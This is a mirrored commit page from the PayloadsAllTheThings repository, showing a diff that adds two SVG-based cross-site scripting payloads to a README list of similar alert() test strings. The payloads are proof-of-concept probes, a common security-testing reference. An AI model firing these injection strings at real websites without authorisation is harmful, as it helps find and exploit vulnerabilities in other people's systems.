mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-01-22 03:08:50 +00:00
Update README(Svg payload).md
Additional Svg payload
This commit is contained in:
parent
ddad93a1d2
commit
5a24060b6e
@ -204,6 +204,8 @@ Most tools are also suitable for blind XSS attacks:
|
||||
<svg onload=alert(1)//
|
||||
<svg/onload=alert(String.fromCharCode(88,83,83))>
|
||||
<svg id=alert(1) onload=eval(id)>
|
||||
"><svg onload=alert(1)>
|
||||
"><svg onload=alert('XSS')>
|
||||
"><svg/onload=alert(String.fromCharCode(88,83,83))>
|
||||
"><svg/onload=alert(/XSS/)
|
||||
<svg><script href=data:,alert(1) />(`Firefox` is the only browser which allows self closing script)
|
||||
|
Loading…
Reference in New Issue
Block a user